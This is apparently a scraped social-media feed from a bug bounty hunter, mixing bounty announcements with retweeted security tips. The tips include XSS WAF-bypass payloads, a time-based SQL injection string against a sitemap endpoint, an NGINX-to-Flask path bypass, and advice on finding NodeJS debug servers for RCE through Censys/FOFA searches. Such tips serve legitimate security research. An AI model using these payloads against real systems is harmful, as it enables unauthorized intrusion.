Bug Hunter | Business : h1xploit@wearehackerone.com

Wkwk Land
H1Xploit retweeted
4 reports have now been confirmed in the @QuantusNetwork audit competition: • 2 Critical • 2 High The competition covers ~70,000 executable lines. The previous figure included docs, tests and libraries. 11 days still to run; get hunting! immunefi.com/audit-competiti…
7
9
101
9,237
Current status: Bug Bounty ❎ Buy Bounty ✅
2
344
H1Xploit retweeted
Bug Hunters 🔥 Ever stumbled upon this weird message? "WebSockets request was expected" If you did, congratz! You just found a NodeJS server in debug mode, ready to quickly move on to RCE via simple DevTools 💥💥💥 Search for this message in Censys/FOFA and your automation 🤑
6
97
541
35,406
H1Xploit retweeted
There were some awesome answers, well done 💥 The explanation: 🤓 NGINX looks for the explicit path "/secret", without caring about case sensitive. But, if we add an extra character to the path, NGINX will no longer block it cause it another path, an the request will be forwarded to the Flask backend. The magic comes when Flask removes certain characters, for example \xA0. So by requesting the path "/secret\xa0", we'll be able to bypass the NGINX rule and access our secret 🔥
Hackers 🔥 I’ve set up this Nginx that forwards traffic to a Flask server and blocks access to /secret - throwing 403 🛑 Can you find a way to bypass this restriction and access /secret? 🥷 Drop your ideas or tricks in the replies — let’s see how creative you can get! ⚡️
1
17
86
7,227
🔒 Big thanks to @H1Xploit! 👏 As a white-hat expert, he identified critical security issues that ensure Umy's system remains safe and stable. Your expertise and selfless contribution are vital in helping us deliver secure services to our users. 💪 At Umy.com, system security and user data protection are our top priorities. We are committed to continuously enhancing security features to create an industry-leading crypto travel platform, ensuring that every user's privacy and data are fully protected. 🛡️ A huge thank you to @H1Xploit for safeguarding our platform, allowing us to continue providing exceptional travel experiences to users worldwide! 🌐 Stay tuned for more updates coming soon. #Umy #DataSecurity #SystemSecurity #Web3Travel #UserExperience
15
1
17
1,067
Use NextJS? Recon Tip by renniepak A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); #infosec #cybersec #bugbountytips
7
264
1,063
51,530
H1Xploit retweeted
Some neat #XSS tricks to #Bypass #WAF in URL Context => HTMLi + Double Encoding + Embedded bytes JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>" JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>" Lab: brutelogic.com.br/dom/sinks.…
2
65
337
27,445
H1Xploit retweeted
very pleased to announce the release of my new article based on my research that led to CVE-2024-46982 titled: Next.js, cache, and chains: the stale elixir zhero-web-sec.github.io/rese… note: does not cover the latest findings shared in my recent posts enjoy reading;
44
233
990
216,634
Crazy mode in @HackenProof 🔥
4
2
12
1,044
Remembering the bounty given by @ton_blockchain and at that time the price of $TON was around $2.3 #TON #BugBounty
500 TON for text injection 👀
2
262
Have you ever reported a security bug via @HackenProof ? How long until you get the bounty? #BugBounty #Whitehat #pentest #Hacker
3
227
First bounty on @immunefi for reporting security bugs to @symbiosis_fi 🥳 #ImmunefiTribe #Hacking
1
3
236
I was gifted $300 worth of $HAI tokens from @HyzenAI as a reward for reporting security bugs on their demo site 🙀, they are very serious about user security 👍🏻 #BugBounty
3
194
H1Xploit retweeted
Super easy bug for new bug hunters 1. Login to the website and go to the profile/settings page 2. Logout 3. Press the back button of the browser 4. If you landed back on the profile/settings page credit: @dirtycoder0124 #bugbountytips #BugBounty #bugbountytip #infosec
11
60
252
26,252
For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎 #bugbountytips #bugbountytip target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)# sleep payload [1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s Happy Hunting #BugBounty
69
504
1,743
146,050
H1Xploit retweeted
Bug Bounty Tip You can use these tricks to bypass the `alert` block by XSS WAF - (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3) Cheers!
2
78
405
37,086
H1Xploit retweeted
2024
13
21
353
40,988